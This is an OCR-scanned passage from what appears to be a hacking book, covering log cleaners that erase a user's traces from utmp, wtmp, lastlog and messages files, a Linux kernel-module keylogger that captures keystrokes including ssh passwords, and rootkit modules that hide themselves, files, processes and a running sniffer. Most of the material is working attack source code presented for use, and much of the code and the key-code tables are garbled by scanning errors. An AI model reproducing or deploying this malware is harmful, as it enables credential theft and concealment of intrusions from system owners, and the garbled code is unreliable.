functions are used in the demonstration log cleaner, but only standard C functions: read (), 
write (), and the like. This is the approach taken in practically all log cleaners. 


19.2. Log Cleaner: Version One 


This section considers implementing a log cleaner that overwrites log information with zeros 
and spaces. The shortcoming of this method is that many intrusion-detection systems check 
the utmp, wtmp, and lastlog files for zero structures. Consequently, smart hackers use log 
cleaners based on the second method of operation (see Section 19.3). I only consider the first 
method because there are many log cleaners based on it. 

The source code for the log cleaner, named logclean|.c, is not given in the book. You can 
find in the \PART V\Chapter 19 directory on the accompanying CD-ROM. Here, I will only 
consider its key aspects. 

I include the lastlog.h header file in the source code (#include <lastlog.h>). However, 
as | said earlier, it is not mandatory to use this header file in Linux systems because it is a link 
to the utmp.h header file. I also define paths to the log files that the log cleaner will clean (al- 
though the UTMP_FILE and WIMP FILE paths are defined in the utmp.h file). 

UTMP FILE “/var/run/utmp" 

WIMP FILE "/var/log/wtmp" 

BIMP FILE "/var/log/btmp" 
LASTLOG FILE "/var/log/lastlog" 
MESSAGES FILE "/var/log/messages" 


#define 
#derine 
f#define 
#define 
#define 


298 Part V: Local Hacking Tools 


The program uses three main functions: The dead uwbtmp() function cleans the utmp, 
wimp, and btmp files; the dead_lastlog() function cleans the lastlog file; and the 
dead messages () function cleans the message text log file. 

The source code for the dead_uwbtmp () function is shown in Listing 19.3. 





Listing 19.3. The dead_uwbtmp() function 





dead uwbtmp(char *name file, char *username, char *tty) 
{ 

struct utmp pos; 

int fd; 


if ( (fd = open(name file, O RDWR)) == -1) { 
perror(name file); 
return; 


} 


while (read(fd, &pos, sizeof(struct utmp)) > 0) 
{ 
if { (strncmp(pos.ut_ name, username, sizeof(pos.ut name)) == 0) && 
(strnemp(pos.ut_line, tty, sizeof (pos.ut_line)) = 0) }) { 


bzerol(4pos, Sizeof({struct utmp)); 


1f (lseek(fid, -sizeof(struct utmp), SEEK CUR) != -1) 
write(fid, &pos, sizeof(struct utmp)); 


close (fd); 





The function is passed the name of the log file to clean along with the user name and TTY 
whose records needs to be cleaned. The user name and TTY are requested in the command 
line. The log file is opened for reading and writing using the open() function, then the file’s 
structures are sequentially read using the read() function. As soon as a match with the user 
name (ut name) and the TTY (ut line) is found, a blank structure is prepared and filled with 
zeros using the bzero() function. The file pointer is placed at the start of the modified struc- 
ture using the lseek() function and the clean structure is written over it using the write () 
function. 

The source code for the dead _lastlog() function is shown in Listing 19.4. 





Listing 19.4. The dead_lastlog() function 





dead lastlog(char *name file, char *username) 
{ 

struct passwd *pwd; 

struct lastlog pos; 
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int fd; 


if (| (pwd = getpwnam(username)) != NULL} 
{ 
1f ( (fd = open(name file, O_RDWR)) == -1) { 
perror(name file); 
recurn; 
} 


lseek(fd, (long)pwd->pw uid * sizeof{struct lastlog), SEEK SET); 
bzero((char *)&pos, sizeof(struct lastlog)}; 

write(fd, (char *)&pos, sizeof(struct lastlog)}; 

close (fd); 








There is no user name field in the last log structure, so an approach different from the 
one for modifying the utmp, wtmp, and btmp files is needed for modifying this file. This 
problem is solved taking advantage of the fact that all records in the lastlog file are sorted by 
UID. More exactly, the dead lastlog() function finds the UID corresponding to the needed 
user name with the help of the standard getpwnam() function. The located structure in the 
lastlog file is than cleaned. 

The source code for the dead messages () function is shown in Listing 19.5. 





Listing 19.5. The dead_messages() function 





dead messages (char *name file, char *username, char *tty, char *ip, char *hostname) 
f 

clear info(name file, username); 

clear info(name file, tty); 


if (ip != NULL) clear info(name file, ip); 
if (hostname != NULL) clear_info(name file, hostname); 





The function is passed the name of the log file to clean along with the user name, TTY, IP 
address, and host name, by which the records that need to be cleaned will be located. The last 
three parameters the user is prompted for from the command line. Of these, the IP address 
and host name are optional; therefore, in the dead messages () function, they are checked for 
being NULL. As you can see, most of the cleaning work is done by the clear_info() function 
(Listing 19.6). 


Listing 19.6. The clear_info() function 








clear info(char *name_ file, char *info) 
char buffer [MAXBUFF’) ; 
FILE *lin; 
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Cy hig: 

char *pntr; 

char *token; 
char blank{200); 


for (i = 0; i < 2700; i++) blank[i] = ' 'y 
if ( (lin = fopen(name file, “r+")} == Q) { 
perror (name file); 
exit(-1); 


while (fgets(buffer, MAXBUFF, lin) != NULL) 
i 
if ( (pntr = strstr(buffer, info)) != 0) { 
Fseek (lin, ftell(lin) - strlen(pntr), SEEK_SET); 
token = strtok(pntr, " "); 
strncpy (token, blank, strlen(token) ); 
fputs (token, lin); 


I 


fclose (lin); 


The clear info() function first prepares the empty buffer, filled with 200 space charac- 
ters. Then the log file is opened for read and write operations and each of its lines is sequen- 
tially read in a loop. If information that needs to be cleaned is found in a string, it is overwrit- 
ten with the spaces from the empty buffer. 

The remaining aspects of the cleaner’s operation ought to be clear from the program’s 
source code. 


19.3. Log Cleaner: Version Two 


In this section, I consider the implementation of a log cleaner based on the second method, 
that is, one that uses temporary files to remove the necessary entries from log files. The source 
code for the log cleaner, named logclean2.c, is not given in the book. You can find in 
the \PART V\Chapter 19 directory on the accompanying CD-ROM. This program also makes 
use of three main functions: The dead uwbtmp()function is used for cleaning utmp, 
wtmp, and btmp files; the function is used to clean the dead lastlog() lastlog file; and the 
dead messages () function is used for cleaning the messages text log file. However, these func- 
tions work differently than their namesakes in the previous log cleaner. 

In the dead uwbtmp() and dead messages () functions, the following approach is used: 
The necessary log file is opened for reading, and a temporary file, named ftmp, is created. 
Then the entries are read sequentially in a loop from the log file and examined for the infor- 
mation that needs to be concealed. Those lines that contain this information are discarded and 
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those that don't are written to the ftmp file. After the log file has been processed in this way, 
the copy tmp() function is called (Listing 19.7). This function replaces the contents of the 
original log file with the information from the temporary ftmp file and then deletes the tem- 
porary file, 


Listing 19.7. The copy_tmp() function 





copy tmp(char *name file) 
{ 
char buffer[100]; 
sprinti (buffer, "cat ftmp > $5 ; rm -f ftmp", name file); 
printf ("ts\n", buffer); 
if (system(buffer) < 0) { 
printf ("Error!"); 
@kKit(-1); 
} 








The function is in many respects similar to its counterpart in the previous section, but 
overwrites the necessary entries not using the bzero() function but simply replacing the in- 
formation in them with spaces and zeros: 

lseek(fd, (long)pwd->pw uid * sizeof(struct lastlog), SEEK SET); 

pos.1ll time = 0; 

strcepy(pos.l11 line, " "); 

strcpy(pos.11 host, ™ ");? 

write(fd, (char *)&pos, sizeof(struct lastlog)); 


The reason why the necessary entries in the lastlog file are not deleted using a temporary 
file is because it is not that easy to read individual entries from this file. 

The remaining aspects of the cleaner’s operation ought to be clear from the source code of 
the program. 





Chapter 20: Keyloggers 





Keyloggers intercept key strokes surreptitiously from the user and save them to a file before 
passing them to the operating system. Hackers use keyloggers primarily to intercept logins and 
passwords, which eventually any user enters for some service. 

A good article devoted to writing keyloggers, “Writing Linux Kernel Keylogger” was pub- 
lished in issue #59 of the electronic magazine Phrack. It considers different ways of intercept- 
ing key strokes in Linux and shows how to implement an LKM keylogger for the version 2.4.x 
kernel. I will not restate any of the material from that article here, but I strongly recommend 
that you become acquainted with that article because it would be a good foundation to writing 
an LKM keylogger for the version 2.6.x kernel, which I do consider. My keylogger is based on 
the keylogger from a hacker going by the nickname of mercenary, described in the article 
“Kernel Based Keylogger” (http://packetstormsecurity.org/UNIX/security/kernel.keylogger.txt). 
This keylogger is also for the 2.4.x kernel, so | simplified it somewhat and rewrote the code for 
the 2.6.x kernel. 

Practically all local or remote key strokes in a Linux shell must be processed by the 
sys_read system call; therefore, intervening in the operation of this call makes it possible 
to intercept all keystrokes. The call can be intercepted and replaced using an LKM kernel 
module. 

The source code for the keylogger is lengthy, so 1 am not giving it all in the book. You can 
find the complete source code in the /PART V/Chapter 20 directory on the accompanying 
CD-ROM. Here I only consider its key aspects. 
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In the init_module() standard module function, the system call read is replaced with 
a custom function, named hacked_read. In the cleanup module function, the original system 
call is restored: 
int init_module (void) 
{ 
find sys_call table(); 
original read = (void *)sys_call table[_ NR read); 
sys_call table[  NR_readj] = (unsigned long)hacked read; 


return 0; 
} 


yoid cleanup module (void) 
{ 

sys_Call table[{ NR_read] = (unsigned long)original read; 
} 


As you can see, at the beginning of the init module() function, there is call of the 
find sys call table() function, which finds the address of the sys _call_table system call 
table, the procedure that must be performed for the 2.6.x kernel (this issue was considered in 
Chapter 18), 

The hacked read() custom function first makes the original call, which is necessary to 
obtain the code of the pressed key; moreover, if this call is not made, the system will not work 
properly: 

int r; 

r= Original read(fd, buf, count); 


The number of read characters is saved in the r variable, and the code of the pressed key is 
stored in the buf buffer. 

Using the strace utility, you can establish that the read() function processes only one key 
code per call (in the following example, the 1s -1a command is entered): 


# Strace sh 


read(Q, "LL", 1) = 
write(zZ, "1", 11) = 
rt_sigprocmask (SiG BLOCK, NULL, [], 8) = 
read(0, "s", 1) = 
write(2, "s", 1s) = 
Ft_sigprocmask(SIG_BLOCK, NULL, [], 8) = 
read(0o, " ", 1) = 
write({2?, ""; I) = 
rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 
read(g, “-", 1} = 
write(2, "-", 1-) = 
rt sigprocmask(SIG BLOCK, NULL, [], 8) = 
read(O, "1", 1) - 
write(?, "1", 11) = 
rt sigprocmask(SIG BLOCK, NULL, [], 8) = 
read(0, “a™, 1) = 


FOr F OP FP OP HE OPP OF Fe 
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write({2, "a", la) = 1 
rt sigprocmask(SIG BLOCK, NULL, [], 8) = 0 
read(O, "\r", 1} = j 
write(2, "\n", 1) =] 
rt_sigprocmask(SIG BLOCK, NULL, [], 8) = 0 


Next, the hacked_read() function examines the contents of the buf buffer and accumu- 
lates all codes from it in the logger buffer buffer: 
static char logger buffer[512]; 


strncat (logger buffer, buf, 1); 


In this process, the special key codes (<F1>—<F12>, <Home>, <End>, arrows, <Tab>, 
etc.) are replaced with their textual descriptions; for example, the <F6> code will be replaced 
with the "[F6]" string: 

if (buf[0] == 0x37) 

strceat(logger buffer, "[F6]"); 


All special keys produce a multibyte code, which starts with 2 bytes with the value of 
Oxib followed by | byte with the value of 0x5b. You can check this with the help of the same 
strace utility: 


# strace -xx sh 


rt_sigprocmask(SIG BLOCK, NULL, [], 8) = 
read(0, "\xlb", 1) = 
read(O, "\xSb", 1) = 
read(0, "\x5b", 1) = 
write(2, "\x07", 1) a 
rt sigprocmask (SIG BLOCK, NULL, [], 8) = 
read(Q, "\x41", 1) - 
write(2, "\x41", LA) = 
rt_sigprocmask(SIG_ BLOCK, NULL, [], 8) = 
read(0, "\xlb", 1) = 
read(0, "\x5b", 1) = 
read(0O, "\x5b", 1) = 
write (2, "\x07", 1) - 
rt_sigprocmask(SIG BLOCK, NULL, [], 8) = 
read(O, "\x42", 1) = 
write (2, "\x42", 1B) - 
rt_sigprocmask (SIG BLOCK, NULL, [], 8) = 


// The <Fl> key was pressed. 


// The <F2> key was pressed. 


ORPrPOeRPrPrRPEP OPP ORPHP HP 


In his article, mercenary gives the codes for all special keys: 


Three-byte key codes: 

UpArrow: Ox1B Ox5B OX41 
DownArrow: Ox1B Ox5SB OX42 
RightArrow: Ox1B Ox5B 0x43 
LeftaArrow: Oxlb OxX5B Ox44 
Beak (Pause): Oxlb Ox5B 0x50 


Four-byte key codes: 
Fl: Oxlb Ox5B Ox5B Ox4l 
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a 
Fé: 
F3 


Oxlb Ox5B 

Oxlb Ox5B 
Fa: Oxlb Ox5B 
FS: Oxlb Ox5B 
Ins: QOxlb Ox5SB 
Home : Oxlb OxSB 
PgUp: Ox1lb OxSB 
Del: Oxlb Ox5B 
End: Oxlb Ox5B 
PgDn: Oxlb Ox5SB 


Five-byte key codes: 


Fe: Oxlb Ox5B 
Frys Oxlb Ox5B 
Fe: Oxlb Ox5B 
Fo: Oxlb Ox5B 
F10: Oxlb Ox5B 
Fli: Oxlb Ox5B 
Fl2: QOxlb Ox5B 


Ox5B 0x4? 
Ox5B 0x43 
Ox5B Ox44 
Ox5B 0x45 
0x32 OxTE 
Ox3l1 Ox7E 
0x35 OxTE 
0x33 OxTE 
0x34 Ox7E 
0x36 Ox7TE 


0x31 0x37 Ox7E 
0x31 0x38 Ox7E 
0x31 0x39 Ox7E 
0x32 0x30 Ox7E 
Ox32 Ox31 Ox7TE 
Ox32 0x33 Ox7E 
Ox32 Ox34 Ox7E 


The demonstration keylogger will process all of these special key codes. 
As soon as a line feed or carriage return is encountered in the buf buffer (1.e., as soon as 


the <Enter> key is pressed), 


the contents of the logger bugger are written to the log file. 


if (but[O] = he! [| Bato) == iin") 4 // Enter? 
strncat (logger buffer, "\n", 1); // Adding a line feed to the buffer 


sprintf (test buffer, 


"$s", logger buffer); // Copying to test buffer 


write _to_logfile({test_buffer}; // Writing the contents of test_buffer 


// to a log file 


logger buffer(0] = '"\O'; // Clearing logger buffer 


} 


The contents are saved in a log file using the write to logfile() function, whose con- 
tents are shown in Listing 20.1. 





Listing 20.1. The function saving the pilfered key strokes to a log file 





int write to logfile(char *buffer) 


{ 


struct file *file = NULL: 


Mm segment _t fs; 
int error, old uid; 


old uid = current->uid; 
current->uid = 0; 


file = filp open(LOGFILE, 


if (IS_ERR(file)) { 
error = PTR ERR(file); 


// If the user is not root, 

// make the user root to avoid 
// problems opening or creating 
// a temporary file. 


O CREAT|O APPEND, 00666); 
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goto out; 
} 


error = -EACCES; 


1f (!S ISREG(file->f dentry->d_inode->i_mode) } 
goto out err: 


error = -EIO; 


1f (!file->f_op->write) 
gote out err; 


error = OG; 


fs = get fs(); 
set fs(KERNEL DS); 


file->f op->write(file, buffer, strlen(buffer), &file->f pos); 


set fs(fs); 
filp close(file, NULL); 


out: 
current->uid = old uid; // Restoring the original user identifier 
return error; 


out err: 
filp close(file, NULL); 
goto out; 

} 





The log file is opened using the filp_open() kernel function, which returns a pointer to a 
file structure. The following log file name and location is used in the keylogger: 
#define LOGFILE "/tmp/log" 


The get fs() and set _fs() functions are used to read data into a buffer located in the 
kernel and not in the user space. 

The remaining aspects of the keylogger’s operation ought to be clear from the source code 
of the program. 

The keylogger is built and installed like a regular 2.6x kernel module (see Chapter 18). 
Don't forget to use the correct name of the keylogger in the makefile: 

obj-m += keylogger.o 


You can enhance your keylogger by, for example, saving a timestamp, the name and num- 
ber of the terminal, and the user identifier used by the user to login. 

Unfortunately, the keylogger has one big shortcoming: It cannot intercept shadow pass- 
words entered using such programs as login and su. However, I noticed that when Midnight 
Commander is running in a separate terminal, the keylogger does intercept these passwords. 
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The reasons for this | have not figured out yet. On the other hand, the keylogger has no prob- 
lems intercepting passwords entered during authorization for ssh, telnet, and other services. 
The following is a sample excerpt from a file formed by the keylogger: 

Is -la 

netstat -na 

[Up.Arrow] [Up.Arrow] [Left .Arrow] [Left.Arrow] [Down.Arrow] 

SSH-2.0-OpenSSH_ 4.2 

SSH-2.0-OpenSSH_4.2 

sklyaroff <-- an ssh password 

@x1t 

lsmod 

To be able to intercept all passwords, keystrokes must be processed on a level lower 
than that of the sys_read call, for example, at the keyboard driver level. You can consult 
the “Writing Linux Kernel Keylogger” article in the issue #59 of the Phrack magazine for 
more information. 


Chapter 21: Rootkits 





A rootkit is a program or a set of programs that an intruder uses to hide his or her presence on 
a computer system to allow surreptitious access to the computer system in the future. Install- 
ing a rootkit is the final step in the break-in process; unless the hacker installs a rootkit, the 
break-in will be detected by the administrator within a short time. The hacker would need 
continued surreptitious access to the compromised machine for such reasons as to install an 
IRC bot for anonymous communication using IRC or for use as a zombie to launch DDoS 
attacks. A hacker can also install a sniffer on the compromised machine and examine all net- 
work packets for passwords, which will provide control of the network, in which the victim 
machine is located. A rootkit, then, hides the tracks of the hacker's activity on the compro- 
mised machine, the tracks being open ports, executed processes, rewritten files, and the like. 

Rootkits come in kernel and nonkernel varieties. Kernel rootkits are composed of one or 
more LKMs that are loaded into the kernel and perform the operations necessary to cover the 
hacker's tracks in the system. Nonkernel rootkits are Trojan versions of executable system 
utilities, such as 1s, ps, top, find, du, ifconfig, netstat, sysloggd, and sshd. After system 
utilities and daemons are replaced with Trojan versions, they do not show the hacker’s proc- 
esses, files, established connections, and so on. 

This chapter considers only kernel rootkits, because nonkernel rootkits are nearly obsolete 
nowadays: They are easily detected by file integrity controls. Moreover, it does not take a lot of 
hacker savvy to add a few lines to the source code of a standard utility and then recompile it to 
obtain its Trojan version. For example, the syslogd utility recompiled with the if 
(strstr(msg, "192.168.10.1")) return; line inserted in the right place in the source code 
will not log entries for the 192.168.10.1 IP address. 
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One of the most well-known nonkernel rootkits for Linux is Linux Root Kit (LRK). 
| included the LRK packet in the CD-ROM so that you can learn about nonkernel rootkits. 
You can find it in the /Part V/Chapter 21 directory. 

The following is a list of capabilities any full-fledged rootkit must have: 


0 Hide Itself. The module does not appear in the list of loaded modules produced by the 
lsmod command. If the hacker does not hide the module, it will be discovered by the ad- 
ministrator eventually and, for example, deleted by the rnmod command. 

O File Hider. This capability prevents utilities installed in the system by the hacker (a sniffer, 
keylogger, backdoor, etc.) from being shown when files are listed. 

O Directory Hider. Instead of spreading the planted files through different directories and 

hiding them in there, the hacker can place them all in one directory, which is then hidden 

using this rootkit capability. 

Process Hider. Similar to hiding files and directories, this rootkit capability prevents in- 

formation about hacker processes from being displayed by the ps command. 

Sniffer Hider. This feature suppresses the PRomIsc flag shown by the ifconfig utility, 

thereby hiding sniffer operations. 

Hiding from netstat. This rootkit capability hides the information about open ports and 

established connections displayed by the netstat utility. 

Setuid Trojan. This automatically grants the user UID=magic number root access privileges. 

The setuid capability was discussed in Chapter 18 when a local LKM backdoor was con- 

sidered, so it will not be considered in this chapter. 


Oo UO OF 


For better understanding, implementation of each of the foregoing capabilities is consid- 
ered in independent modules. Real-life rootkits, however, combine all of these capabilities in 
one module. After such a module is loaded into the kernel, the hacker can call the needed fea- 
ture from the command line. To make the operation of passing commands to the rootkit 
more convenient, it usually includes a control file, to which the commands from the com- 
mand line are passed. This control file does not necessarily have to be an actual file stored on 
the hard drive; it can just be a memory image of a file — that is, a pseudo file. In the rootkit, 
a check is performed for whether the filename parameter in the intercepted execve () call is 
the name of the pseudo file. If it is, the code in the kernel module is executed. 

When preparing this chapter, 1 studied source codes for such well-known rootkits as 
adore-ng, knark, IntoXonia, and lkm Trojan, all of which can be downloaded from the 
http://packetstormsecurity.org site. | borrowed many ideas and chunks of code from these 
rootkits. 

The biggest drawback of kernel rootkits is that they are neither backward nor upward 
compatible, so module code written for one kernel version may not work on a different kernel 
version. For example, module code written for the 2.6.0 kernel may not work on the 2.6.12 
kernel, let alone on the 2.4.2 kernel. So to be certain a rootkit works, first test 1t on the kernel 
version or versions you intend to use it on. 

The source codes for all programs in this chapter can be found in the /PART V/Chapter 21 
directory on the accompanying CD-ROM. 
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21.1. Hide Itself 


Rootkits for older kernel versions (2.0..—2.4.x) hide modules using the technique proposed by 
a hacker going by the nickname of Solar Designer and described in the “Weakening the Linux 
Kernel” article in issue #52 of the electronic magazine Phrack. This technique is based on using 
the module structure, which holds all information about a module. This structure is used by 
the sys init module() system call, which is in turn called by init module(). All it takes to 
remove a module from the list is to find the address of the module structure in the memory 
and zero out the name and refs fields in it. Solar Designer discovered that the address of the 
module structure could be held in one of the ebx, %edi, tebp, and like registers. You only 
had to guess the exact register, in which it was stored. However, a wrong guess could disable 
module viewing in the system. So although with the right guess this method reliably hides 
a module, it is quite dangerous. The following is the source code for implementing this method: 
int init module() 
| register struct module *mp asm("tebx"); /* The register containing 
the module structure address 
mist be used in place of 
the tebx register. */ 


‘(char *) (mp->name) = 0; 
mp->size = 0; 
mp->ref = 0; 

} 

This method, however, will not work in the 2.6.x kernel. In this case, you could use 
another method, the one shown in Listing 21.1, which also works well with many other 
kernel versions. The functions called by the lLsmod command can be determined using the 
strace utility: 


# Strace lsmod 
open ("/proc/modules", O RDONLY) = 6 


read(6, “hide module 2440 0 - Live Oxd0db"..., 1024) = 1024 
write(1, "hide module 2440 0 7..., 33) = 33 


As you can see, a line from the /proc/modules file is read by a call to the read() function; 
the line is then displayed on the screen with a call to the write () function. 

Therefore, the module simply intercepts the write or read call and checks whether 
the lsmod command is executed. If it is, the name of the module is sought in the buffer. 
If it is found, control is simply returned to the system, resulting in the information about 
the module not being shown in the output of the 1smod command. 

This method, however, does not hide the module from being discovered by simply view- 
ing the contents of the /proc/modules file, which stores the names of all loaded modules. You 
could try to solve this problem by doing analogous checks when the file is viewed and deleting 
the information about the module from the output file contents. The problem here, however, 
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is that the file can be viewed by different means, for example, by the cat /proc/modules or dd 
if=/proc/modules bs=1 commands or in Midnight Commander. 





Listing 21.1. A kernel module that hides itself from the Ismod utility (hide_module.c) 





#include <Linux/module .h> 
#include <Linux/kernel .h> 
f#include <linux/syscalls.h> 


MODULE LICENSE ("GPL"); 


/* Name of the module to hide */ 
#define MODULE NAME "hide module" 


int (*orlg_write) (int, const char*, size_t); 
unsigned long* sys call table; 


void find sys call table (void) 


/* See Section 18.2.2 or the source code on the CD-ROM 
for the contents of the find sys call table() function. */ 
} 


int new write(int fd, const char* buf, size_t count) 
f 


char *temp; 
int ret; 


/* If the lsmod command is executed, */ 
/* allocating memory in the kernel space and 
copying the contents of the buf buffer to it */ 
if (!stromp(current->comm, "lsmxi")) { 
temp = (char *)kmalloc(count + 1, GFP KERNEL); 
copy from user(temp, buf, count); 
temo[count + 1] = OG; /* Just in case, add the end-of-line code. */ 
/* Tf the module's name is encountered, */ 
if (strstr(temp, MODULE NAME) != NULL) { 
kfree(temp); /* freeing the buffer in the heap */ 
return count; /* Returning the result */ 
} 


/* Executing the original function call */ 
ret = orig write(fd, buf, count); 
return ret; 


} 


int init module (void) 
{ 
find sys call table(); 
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orig write = (void*)sys call table[_ NR_write]; 
sys call table[ NR write] = (unsigned long)new write; 
return 0; 


void cleanup module (void) 
{ 
sys call table[_ NR write] = (unsigned long)orig_write; 





21.2. Hiding the Files 


The entries in a directory are read by the getdents64 or getdents system calls. The exact call 
used depends on the kernel version and can be learned by using the strace utility as was done 
in the previous section, This call is made by the readdir() function, used to read directories. 
The result produced by getdents64 1s stored as a list of struct dirent structures; the call re- 
turns the number of bytes read. Of interest are the d_reclen and d_name fields of this struc- 
ture, which hold the entry length and the file name, respectively. Thus, all you have to do to 
hide a file entry is to intercept the getdentsé4 call, and then find the corresponding entry in 
the produced list of structures and delete it. The implementation of the module is shown in 
Listing 21.2. 

After the module is assembled and loaded into the kernel, the specified file will not be 
shown in the output of the ls command or in the output of a text editor, such as Midnight 
Commander. However, if you know the name of the hidden file, you can execute it or per- 
form any other operations (e.g., copying) on it. 





Listing 21.2. A kernel module to hide a file (hide_file.c) 





#include <linux/module.h> 
#include <linux/kernel.h> 
#include <linux/dirent.h> 
#include <linux/syscalls.h> 


MODULE LICENSE ("GPL"); 
int (*orig_getdents) (u_int fd, struct dirent *dirp, u_int count); 
unsigned long* sys_call table; 
static char *hide = "file"; /* Name of the file to hide */ 
void find sys call table (void) 
: /* See Section 18.2.2 or the source code on the CD-ROM 
for the contents of the find_sys. call _table() function. */ 


int new_getdents(u_int fd, struct dirent *dirp, u_int count) 
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unsigned int tmp, n; 
int t; 


struct direnté4 { 
int d_inol, d_inod; 
int d_offl, d_off2; 
unsigned short d_reclen; 
unsigned char d_type; 
char d name[0); 

} *dirp2, *dirp3; 


/* Determining the length of the entries in the directory */ 
tm = (*orig getdents) (fd, dirp, count}; 


if (tmp > 0) { 
/* Allocating memory in the kernel space and 
copying the contents of the directory to it */ 


dirp2 = (struct direnté4 *)kmalloc(tmp, GFP_KERNEL); 

copy from user(dirp2, dirp, tmp); 

/* Using the second structure and saving the value 
of the length of the directory entries */ 

dirp3 = dirp2; 

t = tmp; 


/* Searching for the target file */ 
while (t > 0) { 
/* Reading the length of the first entry and determining 
the length of the remaining entries in the directory */ 
n = dirp3->d_reclen; 
tC -= nm; 


/* Checking whether the file name in the current entry matches 
the target file name */ 

if (stremp((char*) &(dirp3->d_name), hide) == NULL) { 
/* If it does, clear the entry and calculate the 
new value of the length of the directory's entries */ 
memcpy (dirp3, (char *)dirp3 + dirp3->d_reclen, t); 
tmp -= n; 

} 


/* Moving the pointer to the next entry and continuing the search */ 
dirp3 = (struct dirent64 *)((char *)dirp3 + dirp3->d_reclen); 
} 
/* Returning the result and releasing the memory */ 
copy to user(dirp, dirp2, tmp); 
kfree(dirp2); 
} 


/* Returning the length of the directory's entries */ 
return tmp; 
} 
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int init module (vold) 
( 
find sys call table(); 
orig getdents = (void *)sys call table[{ NR getdents64); 
sys call table[_ NR getdents64] = (unsigned long)new_getdents; 
return 0; 
I 


vold cleanup module () 
l 

sys call table[ NR getdents64] = (unsigned long) orig_getdents; 
} 





21.3. Hiding the Directories and Processes 


Directories and processes can be hidden using the same method. I learned about this method 
from the “Sub proc_root Quando Sumus (Advances in Kernel Hacking)” article in issue #58 of 
Phrack. The method does not require you to intercept system calls. It is possible because in 
Linux, devices and directories can be considered files. Each “file” is represented in the kernel 
by a file structure. The f op field of the file structure points to the file operations 
structure. The file operations structure stores a to standard file operation functions, 
such as read(), write(), readdir(), and ioctl(). The definitions of the file and 
file operations structures are given in the /linux/ fh header file. The behavior of a specific 
file (directory, device) can be modified by substituting the corresponding function pointer in 
the file operations structure or replacing it with NULL (the latter meaning that the given 
function is not implemented). Because you need to hide directories, the most convenient way 
of doing this is to substitute the pointer to the readdir() function, which is defined in the 
file operations structure as follows: 
int (*readdir}) (struct file *, void *, filldir t); 


The readdir() function implements the readdir (2) and getdents (2) system calls for di- 
rectories and is ignored for regular files. 

The pointer could simply be replaced with NULL, but then no directories would be shown. 
But because a rootkit only needs to hide certain directories, the regular pointer is substituted 
with a pointer to a custom function, which tracks the specified directory. 

If you will recall, the /proc file system has one directory for each process being executed, 
where the PID is the name of the corresponding directory. Directories are created and removed 
as processes are started and terminated. Each process directory contains files storing different 
information about the process. Thus, if the directory of the necessary process in the /proc file 
system is hidden, the process will not be shown by the ps, top, and other similar commands. 
This is why this method for hiding directories can be also used to hide system processes. 
Naturally, it can be used to hide not only directories but also other files, including devices. 

To obtain a pointer to the file structure, the file (directory, device) must be opened, 
In the kernel, a file is opened using the filp open() function. A convenient approach is to 
open the root directory to subsequently hide the necessary files in it. In the module, the root 
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directory is specified using the DIRECTORY ROOT constant. To hide directories in the /proc file 
system, the constant must be given the /proc value, and to hide files outside of the /proc file 
system, the / root directory can be specified. The reason different root directories must 
be specified is that /proc is a special file system, which is stored in the memory and is not re- 
lated to the hard drive. Thus, if the / root directory is opened, files in the /proc file system 
cannot be hidden, and vice versa. 

In the module, not only the pointer to the readdir() function but also the pointer to the 
filldir() function, which is the third argument in the readdir() function, is replaced. 
In the replacement filldir() function, a check for the directory to hide is made. If there 
isa match, the function returns zero, which makes the readdir() function skip this directory. 
The name of the file, directory, or device to hide is specified in the definition of the 
DIRECTORY HIDE constant. 

In the course of my experiments, | determined that directory names are stored as strings 
without the end-of-line zero, and regular files are stored with the ending zero. Therefore, in the 
module, strings are compared using the st rnemp () function. It compares only the first n charac- 
ters, which makes it possible to pass it for comparing a string without the terminating zero. 





Listing 21.3. A kernel module to hide directories and processes (hide_pid.c) 





#include <linux/kernel.h> 
include <linux/module.h> 
#include <lLinux/init.h> 
#include font feud ck. h> 


MODULE LICENSE ("GPL"); 


edefine DIRECTORY ROOT "/proc”" /* Name of the root directory, in which 
the files, directories, or devices are to 
be hidden */ 

#define DIRECTORY HIDE "3774" /* Name of the directory, file, or device 
to be hidden */ 


typedef int (*readdir t) (struct file *, void *, filldir t); 


readdir t orig proc readdir = NULL; 
filldir t proc filldir = NULL; 


int new_filldir(void *buf, const char *name, int nlen, loff_t off, 
ino t ino, unsigned x) 
i 
if (!strnemp(name, DIRECTORY HIDE, strlen (DIRECTORY HIDE} })} 
return 0; 


return proc filldir(buf, name, nlen, off, ino, x); 
} 


int our_proc readdir(struct file *fp, void *buf, filldir t filldir) 
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proc filldir = filldir; 
r= orig proc readdir(fp, buf, new filldir); 
return ©; 

} 


int patch _vfs(readdir_t *orig_readdir, readdir_t new_readdir) 
struct file *filep; 


if ( (filep = filp_open(DIRECTORY ROOT, © _RDONLY, 0)) == NULL) { 
return -1l; 
} 


if (orig readdir) 
*orlg readdir = filep->f op->readdir; 


filep->f op->readdir = new _readdir; 
filp close(filep, 0); 


return 0; 
} 


int unpatch vfs(readdir t orig readdir) 
{ 


struct file *filep; 


if ( (filep = filp open(DIRECTORY ROOT, O _RDONLY, 0)) == NULL) | 
return -l; 
} 


filep->f op->readdir = orig _readdir; 
filp close(filep, 0); 
return 0; 

} 


int init module (void) 
{ 


patch vis (&orig_proc_ readdir, our_proc_readdir); 


return 0; 
I 
void cleanup module (void) 
{ 
unpatch_vis(orig_proc_readdir); 
} 





21.4. Hiding a Working Sniffer 


The PROMISC flag can be suppressed by intercepting the ioct1() system call. The call is re- 
placed with a custom function that checks whether the flag is set and, if it is, clears it. The 
source code for the implementing module is shown in Listing 21.4. 
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Listing 21.4. A kernel module suppressing the PROMISC flag (hide_promisc.c) 





#include <linux/module.h> 
#include <lLinux/kernel.h> 
#include <Linux/if.h> 
#include <linux/syscalls.h> 


MODULE LICENSE ("GPL"); 

int (*orig_ioctl) {int, int, unsigned long); 
unsigned long* sys call_table; 

static int promisc = 0; 


void find sys call table(void) 
{ 
/* See Section 18.2.2 or the source code on the CD-ROM 
for the contents of the find_sys_call_table() function. */ 


int new ioctl (int fd, int request, unsigned long arg) 
1 

int reset = 0; 

ant ret; 

struct ifreq *ifr; 


ifr = (struct ifreq *) arg; 


if (request == SIOCSIFFLAGS) { 
if (ifr->ifr flags & IFF_PROMISC) | 
promsc = 1; 
} else { 
promisc = 0; 
ifr->ifr_flags |= IFF_PROMISC; 
reset = 1; 


ret = (*orlig ioctl) (fd, request, arg); 
if (reset) { 
ifr->ifr_ flags &= ~IFF PROMISC; 
} 
if (ret < 0) return ret; 


1f {request == SICCGIFFLAGS) { 
if (promisc) 
Lfr->ifr flags |= IFF_PROMISC; 
else 
ifr->ifr_ flags «= ~IFF_PROMISC; 


return ret; 
